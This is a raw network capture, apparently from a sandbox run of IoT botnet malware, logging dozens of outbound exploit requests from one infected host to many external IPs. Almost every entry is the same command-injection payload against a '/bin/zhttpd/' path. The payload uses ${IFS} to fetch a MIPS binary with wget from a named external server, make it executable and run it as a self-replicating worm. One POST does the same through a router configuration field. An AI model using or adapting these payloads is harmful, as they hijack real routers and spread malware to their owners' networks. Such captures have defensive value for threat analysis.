                                          Jan 14, 2024 15:46:35.440135956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9182192.168.2.2338768136.164.228.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.440187931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9183192.168.2.2348878182.179.115.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.444439888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9184192.168.2.2346226198.41.221.608080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.369807959 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:36.464904070 CET328INHTTP/1.1 400 Bad Request
                                          Server: cloudflare
                                          Date: Sun, 14 Jan 2024 14:46:36 GMT
                                          Content-Type: text/html
                                          Content-Length: 155
                                          Connection: close
                                          CF-RAY: -
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9185192.168.2.233308479.68.154.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.459798098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9186192.168.2.2346648201.17.71.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.459835052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9187192.168.2.2343804192.220.139.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.459899902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9188192.168.2.235528864.104.186.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.459929943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9189192.168.2.2347352167.224.220.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.459945917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9190192.168.2.235395251.155.190.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460024118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9191192.168.2.2360306119.7.224.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460037947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192192.168.2.2344592208.79.180.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460098028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9193192.168.2.2342154186.239.198.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460134029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9194192.168.2.235907866.188.119.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460136890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9195192.168.2.2357362130.0.203.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460201979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9196192.168.2.234244844.195.17.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460232019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9197192.168.2.235963691.178.81.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460272074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9198192.168.2.2353640185.32.205.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460303068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9199192.168.2.234837452.217.88.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460367918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9200192.168.2.234482276.44.134.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460381985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9201192.168.2.2337324172.237.91.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460433960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9202192.168.2.233572244.245.31.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460484028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9203192.168.2.234699291.196.209.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460544109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9204192.168.2.2350932195.55.112.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460578918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9205192.168.2.234082687.132.169.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460609913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9206192.168.2.2350380167.97.199.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460670948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9207192.168.2.2355460196.78.34.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460686922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9208192.168.2.2352188120.244.30.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460762978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9209192.168.2.234501262.104.96.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460792065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9210192.168.2.2335554120.202.210.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460854053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9211192.168.2.2341806198.142.2.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460886002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9212192.168.2.2353430137.99.197.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460902929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9213192.168.2.2359534103.34.248.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.460968971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9214192.168.2.233446880.53.224.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461020947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9215192.168.2.233949061.162.88.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461040974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9216192.168.2.2335694179.102.184.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461098909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9217192.168.2.234793485.222.73.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461137056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9218192.168.2.2356582174.177.5.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461165905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9219192.168.2.2339018203.98.144.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461218119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9220192.168.2.2358020212.73.159.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461256027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9221192.168.2.233642481.161.145.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461323023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9222192.168.2.2333430176.121.243.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461352110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9223192.168.2.234634414.201.180.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461375952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9224192.168.2.2336352179.117.32.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461402893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9225192.168.2.2338612104.10.248.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461481094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9226192.168.2.234123423.213.97.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461513042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9227192.168.2.2348680200.235.19.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461546898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9228192.168.2.2341160194.127.50.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461596966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9229192.168.2.2333580102.92.252.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461620092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9230192.168.2.2346072150.29.205.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461652994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9231192.168.2.235097232.42.231.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461709023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9232192.168.2.2342120207.4.162.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461747885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9233192.168.2.2353950221.176.33.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461752892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9234192.168.2.2338254157.15.217.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461802959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9235192.168.2.235713470.182.207.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461833000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9236192.168.2.234645048.77.150.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461890936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9237192.168.2.235078083.125.118.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461921930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9238192.168.2.2356964217.166.161.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461937904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9239192.168.2.2353530202.187.124.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.461963892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9240192.168.2.2342132204.26.146.195443
                                          TimestampBytes transferredDirectionData
